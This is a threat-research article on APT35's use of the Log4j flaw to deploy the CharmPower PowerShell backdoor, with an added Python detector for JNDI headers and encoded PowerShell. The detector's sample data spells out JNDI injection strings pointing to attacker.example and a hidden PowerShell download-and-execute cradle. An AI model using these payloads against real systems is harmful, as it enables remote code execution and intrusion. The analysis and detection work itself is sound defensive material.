With the popularity of the Log4j security vulnerability, multiple threat actors, mostly financially motivated, added it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets identified and patched the affected systems.
APT35, which is suspected to be an Iranian nation-state actor, started widespread scanning and attempts to leverage the Log4j flaw in publicly facing systems only four days after the vulnerability was disclosed.
The group deployed a new modular PowerShell-based framework dubbed CharmPower, used to establish persistence, gather information, and execute commands. The attackers chose one of the publicly available open-source JNDI exploit kits, since removed from GitHub due to its enormous popularity following the vulnerability's emergence.
To exploit the vulnerable machine, the attackers send a crafted request to the victim's publicly facing resource. In this case, the payload was sent in the User-Agent or HTTP Authorization headers. After successful exploitation, the exploitation server builds and returns a malicious Java class to be executed on the vulnerable machine. This class runs a PowerShell command with a base64-encoded payload, which eventually downloads a PowerShell module from an Amazon S3 bucket URL.
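As an added example (not code from the original article or from the researchers behind it), the Python below shows the two detection points this exploitation chain gives a defender: a check for JNDI lookups, including the common nested-obfuscation forms, in the User-Agent and Authorization headers, and a decoder for the Base64-encoded PowerShell stage that flags any download from an Amazon S3 URL. The sample requests, the `attacker.example` host and the bucket placeholder are constructed values.

```python
import base64
import re
INNER = re.compile(r"\$\{([^${}]*)\}")                 # innermost ${...} lookup
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)   # plain ${jndi:...} lookup
# PowerShell -EncodedCommand (and the abbreviations it accepts) plus its Base64 argument.
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
S3_URL = re.compile(r"https?://[^\s'\"]*\.amazonaws\.com[^\s'\"]*", re.IGNORECASE)

def _unwrap(m):
    body = m.group(1)                      # text inside one innermost ${...}
    if ":-" in body:                       # ${env:NONE:-j} or ${::-j} -> default value "j"
        return body.rsplit(":-", 1)[1]
    key, _, rest = body.partition(":")
    if key.lower() in ("lower", "upper"):  # ${lower:J} -> "J"
        return rest
    return m.group(0)                      # any other lookup is left untouched

def is_jndi_lookup(value: str) -> bool:
    """True if the header value is, or unwraps to, a ${jndi:...} lookup."""
    prev = None
    while value != prev:                   # peel one nesting layer per pass
        if JNDI.search(value):
            return True
        prev, value = value, INNER.sub(_unwrap, value)
    return False

def flag_requests(requests):               # -> [(request index, header name), ...]
    return [(i, name) for i, headers in enumerate(requests)
            for name in ("User-Agent", "Authorization")
            if name in headers and is_jndi_lookup(headers[name])]

def decode_encoded_command(cmdline: str):
    """Decode the UTF-16LE Base64 script behind a PowerShell -EncodedCommand, else None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def s3_download_urls(cmdline: str):        # S3 URLs referenced by the decoded stage
    return S3_URL.findall(decode_encoded_command(cmdline) or "")
# Constructed sample data for the demo, not values captured from the campaign.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"User-Agent": "${jndi:ldap://attacker.example:1389/a}"},
    {"Authorization": "Bearer ${${lower:j}${upper:n}di:${env:NONE:-l}dap://attacker.example/x}"}]
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://BUCKET-PLACEHOLDER.s3.amazonaws.com/stage.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
```

Header inspection belongs at the reverse proxy or WAF log stage, and the command-line decoder at the endpoint (process-creation events) where the PowerShell stage actually runs.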
CharmPower: PowerShell-based modular backdoor
The downloaded PowerShell payload is the main module responsible for basic communication with the C&C server and the execution of additional modules received. The main module performs the following operations:
- Validate the network connection.
- Perform basic system enumeration.
- Retrieve the C&C domain.
- Receive, decrypt, and execute follow-up modules.
The core module keeps sending HTTP POST requests to the C&C server that either go unanswered or receive a Base64 string which initiates the download of an additional PowerShell or C# module. CharmPower is responsible for decrypting and loading these modules, and these then establish an independent channel of communication with the C&C server.
The list of modules to be sent to the infected endpoint is generated automatically based on the basic system data retrieved by CharmPower during the reconnaissance phase.
Every module is auto-generated by the attackers based on the data sent by the main module: each module contains a hardcoded machine name and a hardcoded C&C domain.
All the modules we observed contain shared code responsible for:
- Encrypting the data.
- Exfiltrating gathered data through a POST request or by uploading it to an FTP server.
- Sending execution logs to a remote server.
Each module performs a specific job. We managed to retrieve and analyse the following modules:
- List installed applications.
- Take screenshots.
- List running processes.
- Get OS and computer information.
- Execute a predefined command from the C&C.
- Clean up any traces created by different modules.
- All the servers we observed in this campaign are hosted by OVH SAS and Hetzner Online GmbH.
- When we investigated the infrastructure, one of the C&C servers we found responded with modules that use 127.0.0.1 as the C&C server. This suggests that the PowerShell-based malware is still under active development.
- The time it takes the C&C server to respond with a module, and the module type it responds with, differs significantly between victims.
Every time a new critical vulnerability is published, the entire security community holds its breath until its worst fears come true: scenarios of real-world exploitation, especially by state-sponsored actors. As we showed in this article, the wait in the case of the Log4j vulnerability was only a few days. The combination of its simplicity and the widespread number of vulnerable devices made this a very attractive vulnerability for actors such as APT35.
Indicators of Compromise